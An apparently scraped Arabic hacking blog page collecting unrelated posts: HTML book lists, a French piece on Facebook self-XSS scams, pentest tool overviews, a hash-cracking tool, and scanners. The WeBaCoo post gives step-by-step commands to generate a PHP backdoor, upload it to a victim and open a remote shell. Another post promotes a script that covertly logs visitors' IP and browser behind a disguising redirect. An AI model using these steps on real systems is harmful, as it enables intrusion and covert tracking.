مجموعة مفيدة من كتب تعلم لغة html

0 التعليقات
السلام عليكم

احبائنا متابعينا وجميع الزوار مرحبا بكم ، انا في هذا الاسبوع مقدم علي تعلم طريقة صنع قالب وفي هذا الصدد اقدم لكم مجموعة من الكتب لتعلم لغة html هذه الكتب جميلة ومساعدة الي درجة كبيرة لتعلم اللغة .

ارجوا ان تساعدكم اقرؤها وسابحث عن كتب تساعد في تعلم لغات تعمل مع html وهي عديدة ولكن افظل لغة css و java






Facebook auto-XSS Scam Fools utilisateurs en eux-mêmes Hacking

0 التعليقات
Facebook auto-XSS Scam Fools utilisateurs en eux-mêmes Hacking

Les escrocs ont de nouveau ciblé plus d'un milliard d'utilisateurs actifs de la populaire réseau social Facebook géant, pour infecter autant de victimes que possible.
Non en servant de faux poste, ni en fournissant lien vidéo illicite, à la place cette fois escrocs ont utilisé une nouvelle façon de tromper les utilisateurs de Facebook en injectant ou en plaçant le code JavaScript côté client malveillant ou dans leurs navigateurs Web.
Ce code malicieux pourrait permettre à un attaquant d'accéder aux victimes de comptes, utilisant ainsi pour fraude, pour envoyer des spams, et de promouvoir de nouvelles attaques en affichant l'arnaque sur le calendrier aux victimes de les amis. Cette technique est connue sous le nom Cross-site Scripting ou Self Self XSS.
Auto-XSS (Auto Cross-Site Scripting) escroquerie est une combinaison de l'ingénierie sociale et un navigateur vulnérabilité , essentiellement conçu pour tromper les utilisateurs Facebook »en donnant accès à leur compte. Une fois qu'un attaquant ou escroc obtient l'accès aux utilisateurs de Facebook compte, ils peuvent même poster et commenter sur les choses sur les utilisateurs de son nom.
Afin d'infecter utilisateur de Facebook, le cyber escrocs envoyer un phishing message via un email ou d'un poste de Facebook d'un des amis dans la liste de la victime ciblée affirmant, dans ce cas, un moyen de pirater ne importe quel utilisateur Facebook en suivant quelques simples étapes.
L'escroquerie posté se présente comme suit:
Hack ne importe quel compte Facebook en suivant ces étapes:
1. Aller au profil de la victime
2 . Cliquez clic droit puis cliquez sur inspecter élément et cliquez sur l'onglet "Console".
3.Collez le code dans la case en bas et appuyez sur Entrée
Le code est dans le site web: http: // textuploader .com **** /
Bonne chance: *
Ne pas mal à personne ...
Ils veulent que vous suivez les instructions données en copiant collant le code malveillant, comme indiqué dans les instructions ci-dessus, pour prendre sur le compte de quelqu'un d'autre. L'astuce est adapté pour les utilisateurs de Google Chrome et Mozilla Firefox.
Facebook auto-XSS Scam Fools utilisateurs en eux-mêmes Hacking
Facebook auto-XSS Scam Fools utilisateurs en eux-mêmes Hacking
Une fois que vous auto-injecter ce script malveillant à votre compte, il va donner l'accès de votre compte entier à celui qui pourrait faire une variété d'activités malveillantes, propagation essentiellement toutes sortes de campagnes malveillantes. Les pirates peuvent également infecter l'ordinateur de la victime par des logiciels malveillants qui peuvent recueillir des détails bancaires et les envoyer à un emplacement distant contrôlé par eux.
Facebook a également inscrit l'arnaque sur la liste des menaces à ses utilisateurs ont été observés à tomber victime. " Les fraudeurs qui utilisent auto-XSS vous tromper généralement en promettant de vous aider à pirater le compte de quelqu'un d'autre » , lit le message . " L'objectif de l'escroc est de vous amener à exécuter leur code malveillant sur ​​votre ordinateur. Lorsque vous exécutez le code, vous accordez l'accès escroc à votre compte pour fraude, spam, et incitant plus de personnes dans l'exécution de l'escroquerie. "
Repérer ces escroqueries et les rapports entre eux sont la meilleure façon de vous protéger, mais si vous êtes victime d'une de ces attaques, ne paniquez pas! Suivez le lien pour en savoir plus sur la protection de votre compte Facebook .
Facebook travaille également avec différents éditeurs de navigateurs pour ajouter une protection dans le navigateur dans un effort pour éviter ce vecteur d'être exploités.

كيف تتوصل بإيميل او SMS على هاتفك ينبهك ان شخص قام بإختراق الويفي في منزلك

0 التعليقات
السلام عليكم

دائما مع الدروس التي نتنولها علي مدونة  والتي نهدف من خلالها نشر المعرفة في عقول جميع الناس وزيادة الافادة ورغم قلة الدروس الا اننا نحاول ان نقدم ما بامكاننا لنكون الافظل في المجال 
اما اليوم فقد توصلت بحلقة لا سابقة وهي طريقة جميلة تمكنك من معرفة ان تم اختراق الويفي الخاص بك عن طريق sms او email علي عنوانك البريدي من خلال برنمجين تثبتهما علي حسوبك وان كان لك مجموعة حواسيب يجب تثبيتهما في الكل
اذن اولا تقوم بتثبيت البرنامجين 
wireless watcher 
ننزل نحو الاسفل ونقوم بالتحميل كما هو بالصورة
مركز تحميل الصور

ثم نقوم بتثبيت البرنامج كالعادي بالظغط علي next حتي يظهر معنا البرنامج بهذا الشكل

مركز تحميل الصور

ثم بعد هذا ننتقل لنحمل البرنامج الثاني الكمساعد في ارسال الرسالة
اولا نتجه الي موق التحميل
Sendmail
نقوم بالتحميل كما هو موصح في الصورة

مركز تحميل الصور

نفك الظغط علي الملف المحمل ثم نقوم بنسخ الملفين sendEmail.exe و sendEmail.pl سنجدهم بعد فك الظغط بعد ذلك نلصقهم في اي مكان من القرص :C
بعد ذلك تعود الي البرنامج الاول wireless watcher تظغط علي options ثم تظعط علي advanced options لبعض التغيرات مركز تحميل الصور
كما يمكنك تبديل وقت عمل scan للروتر من خلال تعديل عدد الثواني في الخيار الاخير background scan interval مما يجعل البرنامج يقوم بتحديث حسب الوقت الذي تكتبه دقيقة او اثنان ... كذلك لا تنسي كتابة الامر التالي
c:\sendEmail -f bourahla@belkacem.com -t bourahla@belkacem.com -u  you have been hacked -m write your message here   -xu bourahla@belkacem.com -xp password. -s smtp.gmail.com:587
اذن غير الي ايميلك وكذلك اكتب باسورد الايميل
اما عن طريقة ال sms فساكتب تدوينة اخري اعلمك فيها طريقة التوصل برسالة نصية

تسريع الايفون والايباد وازالة كافة الملفات غير الضرورية iCleaner

0 التعليقات
طبعن كما نعلم ان اجهزتنا تتعرض للكثير ممن التحميل من البرامج والالعاب وادوات السيديا سوف يقوم iCleaner بالقضاء على أي نصف التحميل حزم سيديا (إذا كنت قد فشل في الاوقات، وبعد ذلك سيكون هناك بالتأكيد العديد من الملفات الغير ضرورية)، وكذلك أكبر قدر من الملفات القديمة مخبأ والكوكيز ورايح تشوف الفرق والسرعة بالتصفح من السفاري او حتى الانستقرام وغيره.
icleaner for ios7
تم اصدار تحديث لاداة iCleaner Pro لتتوافق بالكامل مع iOS 8 لتحميلها باضافة سورس المطور لديك في السيديا:

كيف تتعلم البرمجة و من أين تبدأ ؟؟

0 التعليقات
قد يتسائل البعض عن مدى إرتباط تدوينة البرمجة بمدونة تهتم بالتدوين ! و هي al mohatrif !
حسنا ,, العديد منا يريد الدخول في عالم بلوجر و إجادة الإبحار فيه ,, من بين المشاكل التي قد يجدها البعض هي تكويد و تصميم قالب بلوجر ,
و على أساس صنع قالب بلوجر , عليك أولا تعلم لغات البرمجة , دعنا نقول التصميم أكثر من البرمجة لأن البلوجر سهل جدا في الحصول على قوالب , ليس كما هو الحال مع تعلم برمجة السكربتات و غيرها ..
ستكون لنا تدوينة قريبا و لم لا دورة مصغرة لتكويد و تصميم قالبك بلوجر .. لكن سنتعمق في عالم البرمجة أكثر في هذه التدوينة .



لتعلم البرمجة عليك أولا أن تحدد مجالك و ميولاتك في البرمجة ,, فهناك منا من يفضل برمجة التطبيقات application سوى  لهواتف الأندرويد أو تطبيقات سطح المكتب و منا من يفضل برمجة الويب أو بالأحرى برمجة المواقع و المدونات إلخ ..

إذن في هذه التدوينة سنهتم ببرمجة الويب .. وهي بحر شاسع سنتطرق |إلى أهم لغاته و الترتيب السليم لتعلمه .

1- html وهي ليست لغة برمجة كما يعتقد البعض , بل هي لغة هيكلة و هي لغة أساسية جدا للمواصلة في ممشوار برمجة الويب .
2- css  وهي أيضا ليست بلغة برمجة , بل هي لغة تصميم ’ فالمواقع التي تراها و تحلو لعينيك تستعمل css لتجميل و زخرفة المواقع . و هي لغة سهلة جدا ,
3-PHP هي لغة قوية جدا تستعمل في إنشاء السكريبتات و المواقع .
4-ــJavascript هي لغة مهمة أيضا عليك تعلمها و هي لغة دينامكية لها العديد من المكتبات البرمجة مثل JQuey .
(لتعلم JQuery عليك تعلم الجافاسكربت أو حتى أساسياتها ,, و هي مهمة جدا لمصممي المواقع ).
أنصحك أيضا بقرائة مقالة مهمة لتحسين ترتيب ألكسا

تكملة للموضوع :  حل المشاكل البرمجية + نصائح لتصبح مبرمج محترف !  
لو أعجبتك التدوينة .. رجاء أنشرها لتعم الفائدة ..

Ravan , JavaScript based Distributed Password cracking

0 التعليقات

You want to crack a hash but your system speed is low?! No need to worry..! Here is solution for you , "Distributed Password Cracking". Let me introduce a new tool called "Ravan" developed by LavaKumar.

About Ravan:
Ravan is a JavaScript based Distributed Computing system that can perform brute force attacks on salted hashes by distributing the task across several browsers. It makes use of HTML5 WebWorkers to start background JavaScript threads in the browsers of the workers, each worker computes a part of the hash cracking activity.
Ravan now supports MD5,SHA1,SHA256,SHA512 hashes.


How it works?
Ravan has three components:



Master:
The hash, salt, hashing algorithm, position of the salt (before or after salt) and the charset are submitted by the user. These are submitted to the web backend and it returns a ‘hash id’ which is unique to every submitted hash. It also supplies a ‘worker url’ specific to this hash that must be sent to potential workers.
Once the hash is submitted the master creates arrays of slots (each array contains 5 slots), this is submitted to the web backend. Each slot represents a small part of the keyspace, this is how the entire activity is broken down in to multiple tiny tasks. A single slot represents 1 million combinations.
The master constantly polls the web backend to check on the progress of the cracking process. As the existing list of slots is completed by the workers the master allots more slots. When a worker cracks the hash and returns the clear-text value the master confirm this and then signals all workers to stop cracking.


Web Backend:
The web backend acts as a proxy between the master and the workers. It does not perform any actual computation but validates the data submitted by both the parties and passes information between them.


Worker:
The worker performs the actual hard work of cracking the hashes. Each hash has a unique worker URL and this page explicitly asks for the user permission before the cracking process is started. Once the user accepts and clicks ‘Start’ the worker polls the web backend for available slots, the web backend returns an array of slots from its database. The worker cracks each slot and sends the result to the web backend. After completing all the slots it polls the web backend for more slots.



Here is the tool:
here

Tutorial: How to use Ravan Tool?

مختبر الإختراق وأهم الأدوات التي يستخدمها

0 التعليقات

 لكل مهنه أدواتها فعليك أن تستخدم الأدوات هذه مع العلم الموجود لديك لكي تنجز المهمه الخاصه بك بكل سهولة ! وهذه هي النقطة الجوهرية في عالم الإختراق فلا نجد طبيب من دون سماعه ! ولا نجار من دون منشار ! فالطبيب عند إستعمال السماعه يستطيع تلخيص مرضك والنجار عند إستعمال المنشار ينجز المهمه المطلوبه له ومختبر الإختراق عند إستخدام هذه الأدوات يؤدي واجبه بكل سهوله !! المشكلة الحقيقية ليست في إستخدام الأدوات بل بفهم عمل هذه الأدوات ومعرفة كيفية إستخدامها بشكل صحيح للوصول إلى نتائج والأهم من ذلك كله هو معرفة لماذا تستخدم هذه الأداه فللأسف أغلب المواضيع في المنتديات العربية التي تتكلم عن الميتاسبلويت مثلاً تصور الميتاسبلويت على أنه البرنامج (الأداة) التي تستطيع من خلالها الوصول إلى القمر !! وأن من يستخدم هذه الأداة هو محترف !! أنا بإمكاني أن أعطي هذه الأداة إلى أخي الصغير وأخبره أن يقوم بعمل خطوات معينه وسوف يقوم بعملها من دون مشكلة !! المشكلة الحقيقة ليست بإستخدام الأدوات أو كيفية عملها !! بل لماذا أنت تستخدم الأداة هذا بعد ما تكون قد فهمت عملها وفهمت كيفية عمل النظام الذي سوف تقوم بتطبيق وتشغيل هذه الأداة عليه.
pentester1
أساس هذا المقال لكي يوضح أن مختبر الإختراق من دون أدوات هو مثل الطبيب في غرفة العمليات من دون أي شيء العلم سوف يفيدك لمرحلة معينه ولكن بالتأكيد الأدوات سوف تفيدك بشكل شامل وهذه النقطة يجب عليك أن تفهمها بشكل صحيح وكما ذكرنا أيضاً في مقال سابق عن نظام Backtrack وأنه لا يشترط أن يكون من يستخدمه هو شخص محترف ! والأن سوف أبدأ بطرح بعض الأمثلةعن بعض الأدوات وإستعمالتها ولماذا يجب عليك أن تفهم طريقة عملها :

لنبدء بأدوات الفحص وجمع المعلومات :

  • أداة Nmap : وهي أداة يتوفر منها نسخ لجميع الأنظمه وتستخدم هذه الأداة في عمليات فحص الأنظمة والشبكات والسيرفرات وإستخراج جميع المعلومات التي تخصها وبالطبع تساعدك هذه الأداة على جمع قدر كبير من المعلومات لكي تستطيع أن تبني عملية إختبار إختراق شاملة وكاملة عليها.
Nmap
  • أداة Maltego : هي أداة مخصصه لجمع المعلومات عن الأهداف مثل الأشخاص , المواقع , السيرفرات والشبكات وتستطيع أيضاً تحديد أمور كثيره وتبني أمور كثيره من خلال المعلومات النتاجه من هذه الأداة لأنه بالفعل تعتبر أساس عملية جمع المعلومات العامة ويتم فحص وإستخراج المعلومات من خلال حركات محركات البحث والشبكات الإجتماعية لذلك تعتبر نتائجه قوية ومفيدة.
Maltego
نأتي الأن لبعض أدوات الهجوم لتطبيقات الويب :
  • أداة SQLmap : من أقوى الأدوات الموجودة على الساحة العالمية والمخصصة لإستغلال ثغرات SQLi بجميع أنواعها وعلى جميع الأنظمة وجميع أنواع قواعد البيانات ومن الجدير بالذكر أنها مفتوحة المصدر ومبرمجة بلغة البايثون وتستطيع هذه الأداه أيضاً عمل الكثير من الأمور بعد عملية الحقن والإستغلال الناجح للثغرة من خلال العديد من الخيارات التي توفرها لك.
Sqlmap
  • أداة Weevely : هي أداة قوية بالفعل تساعدك على عمل إتصالات عكسية مع السيرفر وزيادة التحكم به من خلال توفير بعض الملفات التي تقوم بإنشاء إتصال عكسي بين العميل والسيرفر وأرسال الأوامر من خلاله ومن الجدير بالذكر أنا هذه الأداة مبرمجة بلغة بايثون ويمكن التعديل عليها كونها مفتوحة المصدر.

weevely
  • أداة Burp Suite : وهي أداة مبرمجة بلغة Java يوجد منها إصدار مجاني وإصدار تجاري , تستخدم هذه الأداة في أمور عديدة ومفيده مثل إنشاء بروكسي بينك وبين الموقع وتحليل الطلبات وعمل زحف Crawling على الموقع أي إستخراج جميع الملفات منه وأيضاً تشفير الطلبات والفحص المواقع وإستخراج الثغرات والعديد من الأمور المفيده الأخرى.
Brup
نأتي الأن لبعض أدوات الهجوم للشبكات والأجهزه : 
  • أداة Metasploit : وهي من أكبر الأدوات الموجودة في عالم إختبار الإختراق وهي أداة مبرمجة بلفة Ruby تحتوي على مجموعه عملاقة من الأدوات والثغرات التي بالفعل تساعد مختبر الإختراق على القيام بعمله وتقيم مستوى أمن الشبكة بكل سهولة كما أنك تستطيع القيام بالعديد من عمليات الفحص وجمع المعلومات والتخمين من خلال الأدوات التي توفرها الأداة.
Metasploit
  • أداة SET  : وهي اداة مبرمجة بلغة بايثون تعرف بإسم social engineer toolkit تستخدم في إختبار إختراق الشبكات والأجهزه من خلال تجهيز بعض الطرق والأمور الخاصة بإختبار الإختراق عن طريق تضليل المستخدم وبإستخدام طريقة Client Side Attack في الهجوم وهذا البرنامج شهير جداً في عملية إختبار الإختراق لأنه يحتوي على العديد من الهجمات القاتلة فعلاً للشبكات والأجهزه ومن الممكن بالفعل أن تقوم من خلاله بالعديد من الهجمات القوية.
Set
  • مجموعة أدوات aircrack-ng : وهي مجموعة من الأدوات التي تستخدم في فك تشفيرات الشبكات اللاسلكية بنوعيها wep // wap وأيضاً عمل هجمات كثيرة على الشبكات من خلال هذه المجموعة بالفعل تستطيع السيطرة على الشبكات وأيضاً التجسس عليها من خلال تكاملها مع أدوات أخرى مثل ettercap تستطيع بالفعل تنفيذ هجمات قوية تستطيع من خلالها تقيم وضع الشبكة الأمني.
Aircrack

هذه هي مجموعة من الأدوات التي بالفعل أستخدمها بشكل شخصي وأقتصر على إستخدامها بالإضافة إلى بعض الأدوات التي أبرمجها بنفسي وأستخدمها وقت الحاجة بالطبع هي ليست بإحترافية مثل هذه الأدوات ولا قوتها ولكن تؤدي الأمور والهجمات التي أحتاجها في عملي , وهنالك المئات من الأدوات القوية التي يمكنك إستخدامها ولكن لا بد ان تكون على دراية كاملة بكفية عمليها وقبل ذلك لا بد أن تكون فاهم وواعي للحالات التي يجب إستخدامك لمثل هذه الأدوات والتي تأتي من الخبرة والتعلم المستمر والتجربه.

WeBaCoo (Web Backdoor Cookie Script-Kit)

0 التعليقات


Usage: webacoo.pl [options]

Options:

-g Generate backdoor code (-o is required)

-f FUNCTION PHP System function to use

FUNCTION:
1: system (default)
2: shell_exec
3: exec
4: passthru
5: popen

-o OUTPUT Generated backdoor output filename

-r Return un-obfuscated backdoor code

-t Establish remote "terminal" connection (-u is required)

-u URL Backdoor URL

-c C_NAME Cookie name (default: "M-cookie")

-d DELIM Delimiter (default: New random for each request)

-a AGENT HTTP header user-agent (default exist)

-p PROXY Use proxy (tor, ip:port or user:pass:ip:port)

-v LEVEL Verbose level
LEVEL:
0: no additional info (default)
1: print HTTP headers
2: print HTTP headers + data

-h Display help and exit

update Check for updates and apply if any

1. Generate php backdoor file
- ./webacoo.pl -g -o backdoor.php

2. Upload backdoor to victim

3. Use WeBaCoo connect to backdoor
- ./webacoo.pl -t -u http://victim/backdoor.php

4. Now you are in the victim console, do whatever you want :)

VIDEO TUTORIAL:


here

DOWNLOAD LINK: 

Uniscan and Nikto web scanners

0 التعليقات
Uniscan scanner

Uniscan is a web vulnerability scanner written in perl language,it comes with a variety of scanning techniques.
It is mostly used by black hat means hacker's because its very easy in usage and any can be familiar with it in just a minute it comes built in Backtrack 5.

Uniscan is a simple Remote File Include, Local File Include and Remote Command Execution vulnerability scanner.
It has many options like:

-h ( for help )
-u ( for confirming a target like -u www.target.com )
-b ( Order uniscan to go background when the scanning will start )
-q ( For Enable Directory Checks )

DOWNLOAD UNISCAN:
Nikto scanner


Nikto Web Scanner is a Web server scanner that tests Web servers for dangerous files/CGIs, outdated server software and other problems. It performs generic and server type specific checks. It also captures and prints any cookies received.
The Nikto code itself is Open Source (GPL), however the data files used to drive it are not.
Chris Sullo, the CFO of Open Security Foundation has written this scanner for vulnerability assessment.

DOWNLOAD NIKTO:

TUTORIAL FOR 
Uniscan and Nikto web scanners

جلب و سحب Ip و إصدار النظام و المتصفح برمجيا المصدر:

0 التعليقات

السلام عليكم و رحمة الله تعالى و بركاته سكريبت تمكنت من الحصول عليه  بيسط وظيفته سحب الأيبي و معلم النظام و إصدار المتصفح و حفظه
في ملف txt ..طيف كيف الإستخدام تحتاج إلى مساحة شيل cpanel تقدر تجربها على اللوكل الهوست بيع حفظ الملف بصيفة php

عند فتح سوف يتحول تقائيا المستخدم إلى جوجل تقدر تغيره غلى أي موقع فقظ هذا كشكل من اشكال التمويه :) وبعدها سوف ينشئ ملف بإسم ip_Log.txt عند فتح سوف تجد المعلومات التي تريدها عزيزي زائرالموقع انا لست مسؤل عن هذا السكريبت لذلك ابقي برنامج الحماية مشغلا في حالة ما اذا اصيب جهازك باي ضرر افصله عن الانترنيت وقم بفرمطة الحاسب ..














DOwnload: 


جميع الحقوق محفوظة ©2012-2013 | ، نقل بدون تصريح ممنوع . Privacy-Policy| أنضم ألى فريق التدوين

traget='_blank'>